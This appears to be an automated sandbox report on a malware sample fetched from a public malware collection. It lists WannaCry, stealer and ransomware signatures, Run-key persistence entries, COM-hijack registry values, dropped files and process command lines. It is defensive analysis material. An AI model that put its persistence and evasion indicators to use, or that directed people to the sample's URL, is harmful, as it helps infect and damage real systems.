Malware Analysis Report

2024-11-30 13:55

Sample ID 240809-3m7ersveqm
Target https://github.com/Endermanch/MalwareDatabase/blob/master/davepl/AdvancedSystemOptimizer.7z
Tags wannacry defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware spyware stealer trojan upx worm
Score 10/10

Analysis Overview

Score 10/10

Threat Level: Known bad

The file https://github.com/Endermanch/MalwareDatabase/blob/master/davepl/AdvancedSystemOptimizer.7z was found to be: Known bad.

Malicious Activity Summary

wannacry defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware spyware stealer trojan upx worm

Wannacry

Deletes shadow copies

Downloads MZ/PE file

Executes dropped EXE

Checks BIOS information in registry

Modifies file permissions

Event Triggered Execution: Component Object Model Hijacking

UPX packed file

Reads user/profile data of web browsers

Loads dropped DLL

Checks installed software on the system

Checks whether UAC is enabled

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Network Share Discovery

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Drops file in System32 directory

Drops file in Program Files directory

Subvert Trust Controls: Mark-of-the-Web Bypass

Event Triggered Execution: Netsh Helper DLL

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Modifies registry class

Opens file in notepad (likely ransom note)

NTFS ADS

Uses Task Scheduler COM API

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Views/modifies file attributes

Suspicious behavior: GetForegroundWindowSpam

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Runs .reg file with regedit

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-09 23:38

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-09 23:38

Reported

2024-08-09 23:51

Platform

win11-20240802-en

Max time kernel

380s

Max time network

709s

Command Line

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://github.com/Endermanch/MalwareDatabase/blob/master/davepl/AdvancedSystemOptimizer.7z"

Signatures

Wannacry

ransomware worm wannacry

Deletes shadow copies

ransomware defense_evasion impact execution

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\PROGRA~2\REGIST~1\RegClean.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLJ8DC2.tmp N/A
N/A N/A C:\PROGRA~2\REGIST~1\RegClean.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Windows\CurrentVersion\Run\Registry Cleaner = "C:\\PROGRA~2\\REGIST~1\\RegClean.exe" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Windows\CurrentVersion\Run\Registry Cleaner = "C:\\PROGRA~2\\REGIST~1\\Regclean.exe" C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Windows\CurrentVersion\Run\SOProc_SoRefRegSoAlertWxLiteNnAj = "rundll32 shell32.dll,ShellExec_RunDLL C:\\PROGRA~2\\SOFTWA~1\\soproc.exe -pack SoRefRegSoAlertWxLiteNnAj" C:\PROGRA~2\SOFTWA~1\soproc.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Windows\CurrentVersion\Run\Registry Cleaner = "C:\\PROGRA~2\\REGIST~1\\Regclean.exe" C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\PROGRA~2\REGIST~1\RegClean.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Network Share Discovery

discovery

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\GLBSINST.%$D C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\7-Zip\Lang\sq.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\PROGRA~2\REGIST~1\INSTALL.LOG C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
File opened for modification C:\Program Files\7-Zip\Lang\mng.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\nb.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File created C:\Program Files (x86)\Registry Cleaner Trial\~GLH0007.TMP C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
File opened for modification C:\Program Files\7-Zip\Lang\ko.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files (x86)\Registry Cleaner Trial\UNWISE.EXE C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
File opened for modification C:\Program Files\7-Zip\Lang\sk.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7-zip.dll C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ru.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sw.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\tg.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\uz-cyrl.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7z.exe C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\eu.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\fy.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\PROGRA~2\REGIST~1\RegClean.exe C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
File created C:\Program Files (x86)\Registry Cleaner Trial\~GLH000c.TMP C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
File opened for modification C:\PROGRA~2\REGIST~1\regclean.dll C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
File created C:\Program Files (x86)\Registry Cleaner Trial\~GLH0005.TMP C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
File opened for modification C:\Program Files (x86)\Registry Cleaner Trial\regclean.dll C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
File opened for modification C:\Program Files (x86)\Registry Cleaner Trial\Registry Cleaner.chm C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
File opened for modification C:\Program Files\7-Zip\Lang\es.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Uninstall.exe C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\gl.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\readme.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\fr.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\lij.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\nn.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\tk.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File created C:\Program Files (x86)\Registry Cleaner Trial\~GLH0008.TMP C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
File created C:\Program Files (x86)\Registry Cleaner Trial\~GLH0002.TMP C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
File opened for modification C:\Program Files (x86)\Registry Cleaner Trial\soref.dll C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
File opened for modification C:\Program Files\7-Zip\Lang\cy.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\hu.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files (x86)\Registry Cleaner Trial\License.rtf C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
File opened for modification C:\Program Files\7-Zip\Lang\lt.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\nl.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\tr.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File created C:\Program Files (x86)\Registry Cleaner Trial\~GLH000a.TMP C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
File opened for modification C:\Program Files\7-Zip\Lang\ca.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\io.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\is.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\si.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sr-spc.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sv.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\bn.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mk.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\uz.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\vi.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\yo.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7zCon.sfx C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File created C:\Program Files (x86)\Registry Cleaner Trial\~GLH0003.TMP C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
File opened for modification C:\Program Files\7-Zip\Lang\ba.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\pt.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ga.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\kk.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ta.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File created C:\Program Files (x86)\SoftwareOnline\~GLH0006.TMP C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
File opened for modification C:\Program Files\7-Zip\Lang\af.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ext.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files (x86)\Registry Cleaner Trial\UNWISE.EXE C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A

Subvert Trust Controls: Mark-of-the-Web Bypass

defense_evasion
Description Indicator Process Target
File created C:\Users\Admin\Downloads\7z2407-x64.exe:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key opened \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\NetSh C:\PROGRA~2\REGIST~1\RegClean.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\PROGRA~2\SOFTWA~1\soproc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\GLJ8DC2.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-KE31S.tmp\is-SUFUB.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Endermanch@RegistryCleaner_SOReferral.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\InProcServer32 C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\kJxnabybjqg = "TTxxv^YAQEcJJE\\hb" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\qjggq = "l_G`xTwri`BbprPyWEe_Z[DNKa" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\ = "RasDlg LUA" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09} C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\Elevation C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\InProcServer32\ThreadingModel = "Apartment" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\zGljodoswbF = "|T^t@\\d{lC^NffBEn@z" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\eocs = "brU[cvMGKCaIszBdCp" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\zGljodoswbF = "|Tnt@\\d{lC^NffBEn@z" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\Elevation\IconReference = "@%SystemRoot%\\system32\\rasdlg.dll,-562" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\evewxZeC = "dv]erdCFAqArp@}b}sRorWd|LOtIgfU" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\pujw = "[PQkCB^qCwvWutO[PEwYCZ`u\x7fVKqEza" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\eocs = "brU[cvJGKCaIxsvo{P" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\AppId = "{0C3B05FB-3498-40C3-9C03-4B22D735550C}" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\InProcServer32\ = "%SystemRoot%\\SysWow64\\rasdlg.dll" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000} C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\LocalizedString = "@%SystemRoot%\\system32\\rasdlg.dll,-361" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\qjggq = "l_G`xTwri`BbprPyWEe_j[DNKa" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\Elevation\Enabled = "1" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\dUiEfhXoo = "QnYbUK|C{LO^qD@VnbEizTpua" C:\PROGRA~2\REGIST~1\RegClean.exe N/A

Modifies registry key


NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\AdvancedSystemOptimizer.7z:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\7z2407-x64.exe:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\RegistryCleaner.7z:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\CPURocket.7z:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Opens file in notepad (likely ransom note)

ransomware

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 33 N/A C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~2\REGIST~1\RegClean.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\Downloads\7z2407-x64.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4920 wrote to memory of 4528 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 2500 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A N/A N/A

Processes

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://github.com/Endermanch/MalwareDatabase/blob/master/davepl/AdvancedSystemOptimizer.7z"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://github.com/Endermanch/MalwareDatabase/blob/master/davepl/AdvancedSystemOptimizer.7z

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1924 -prefMapHandle 1916 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eedb6394-5950-4d89-a565-572d2fb75f3f} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2412 -parentBuildID 20240401114208 -prefsHandle 2388 -prefMapHandle 2376 -prefsLen 24598 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a7d5423-5914-446b-843b-b3c2ea8dad02} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" socket

C:\Program Files\Mozilla Firefox\firefox.exe

